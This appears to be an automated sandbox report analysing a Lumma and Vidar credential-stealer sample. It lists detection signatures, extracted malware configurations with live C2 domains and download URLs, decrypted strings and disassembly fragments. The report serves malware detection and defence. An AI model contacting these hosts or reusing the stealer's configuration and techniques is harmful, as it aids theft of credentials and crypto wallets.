Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1501434
MD5: 5095864caf019967467c5714897ee419
SHA1: 17e649d5784db18d790c77bdd300b9ff73dbf5ea
SHA256: 26047c08e200668e57088cb5b9577ed7975bf6309db51fe3544c54878430e8a3
Tags: exe

Detection

LummaC, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: condedqpwqm.shop Avira URL Cloud: Label: phishing
Source: https://steamcommunity.com/profiles/76561199761128941 Avira URL Cloud: Label: malware
Source: http://147.45.68.138/nss3.dll Avira URL Cloud: Label: malware
Source: http://147.45.68.138/sql.dll Avira URL Cloud: Label: malware
Source: https://t.me/iyigunl Avira URL Cloud: Label: malware
Source: http://147.45.68.138/softokn3.dll Avira URL Cloud: Label: malware
Source: stagedchheiqwo.shop Avira URL Cloud: Label: phishing
Source: https://locatedblsoqp.shop/api Avira URL Cloud: Label: phishing
Source: stamppreewntnq.shop Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/msvcp140.dll Avira URL Cloud: Label: malware
Source: https://awwardwiqi.shop/api Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exe Avira URL Cloud: Label: malware
Source: http://147.45.68.138/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://147.45.68.138/msvcp140.dll? Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/apibu Avira URL Cloud: Label: malware
Source: http://147.45.68.138/mozglue.dll Avira URL Cloud: Label: malware
Source: locatedblsoqp.shop Avira URL Cloud: Label: phishing
Source: caffegclasiqwp.shop Avira URL Cloud: Label: malware
Source: millyscroqwp.shop Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/api Avira URL Cloud: Label: malware
Source: https://traineiwnqo.shop/ Avira URL Cloud: Label: malware
Source: http://147.45.68.138/freebl3.dll Avira URL Cloud: Label: malware
Source: traineiwnqo.shop Avira URL Cloud: Label: malware
Source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "4384b1ceb77dcf470b759bedd7bb140b"}
Source: 9.2.RegAsm.exe.400000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["traineiwnqo.shop", "caffegclasiqwp.shop", "awwardwiqi.shop", "stamppreewntnq.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "condedqpwqm.shop", "locatedblsoqp.shop", "stagedchheiqwo.shop"], "Build id": "H8NgCl--"}
Source: C:\ProgramData\KJKJJJECFI.exe ReversingLabs: Detection: 34%
Source: C:\ProgramData\KKJEBAAECB.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd8fb6f7b_lgjfd[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd9a65b5d_vqwergf[1].exe ReversingLabs: Detection: 34%
Source: file.exe ReversingLabs: Detection: 34%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: caffegclasiqwp.shop
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: stamppreewntnq.shop
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: stagedchheiqwo.shop
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: millyscroqwp.shop
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: evoliutwoqm.shop
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: condedqpwqm.shop
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: traineiwnqo.shop
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: locatedblsoqp.shop
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: awwardwiqi.shop
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: TeslaBrowser/5.5
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: - Screen Resoluton:
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: - Physical Installed Memory:
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: Workgroup: -
Source: 9.2.RegAsm.exe.400000.0.unpack String decryptor: H8NgCl--
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00406AB6 CryptUnprotectData,LocalAlloc,LocalFree, 2_2_00406AB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040F8D5 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 2_2_0040F8D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00406A53 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 2_2_00406A53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004083FA memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,PK11_FreeSlot,lstrcatA, 2_2_004083FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C0D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 2_2_6C0D6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C22A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 2_2_6C22A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 2_2_6C1F4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C224440 PK11_PrivDecrypt, 2_2_6C224440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2244C0 PK11_PubEncrypt, 2_2_6C2244C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 2_2_6C2725B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C208670 PK11_ExportEncryptedPrivKeyInfo, 2_2_6C208670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C22A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 2_2_6C22A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C20E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 2_2_6C20E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C24A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 2_2_6C24A730
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: c:\rje\tg\h2r2\obj\Re\ease\etf.pdb source: file.exe
Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2148380649.0000000035593000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2142626224.00000000296BC000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2385875761.000000001DB7B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: Binary string: c:\rje\tg\obj\Re\ease\etf.pdb source: KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose, 2_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00409317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose, 2_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 2_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose, 12_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 2_2_0041391C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+1Ch] 9_2_0040C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esp] 9_2_0040B810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [ebp-14h] 9_2_0043BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov edx, dword ptr [esp] 9_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov edx, dword ptr [esp] 9_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 9_2_00413846
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+00000874h] 9_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [edx], cx 9_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [edx], cx 9_2_0041F862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch] 9_2_0043A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 9_2_004390C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esp] 9_2_0043E8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 9_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp eax 9_2_00413888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [edx], cx 9_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esp] 9_2_0041D940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 9_2_00431950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ecx], al 9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ecx], al 9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [ebp-24h] 9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx eax, word ptr [ebx] 9_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h 9_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 9_2_00413A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h] 9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esi+34h] 9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esi+34h] 9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esi+18h] 9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 9_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h 9_2_0043F290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [edi], al 9_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], cx 9_2_00423BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [ecx], ax 9_2_0041DBEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 9_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_0043D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 9_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 9_2_0041C400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov edx, dword ptr [ebp-10h] 9_2_0041E411
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_004104D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+38h] 9_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp edx 9_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp byte ptr [ebx+01h], 00000000h 9_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 9_2_00424640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov word ptr [eax], cx 9_2_0041C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 9_2_00415E62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h] 9_2_0042866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 9_2_00403E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+00000874h] 9_2_0041E6C0
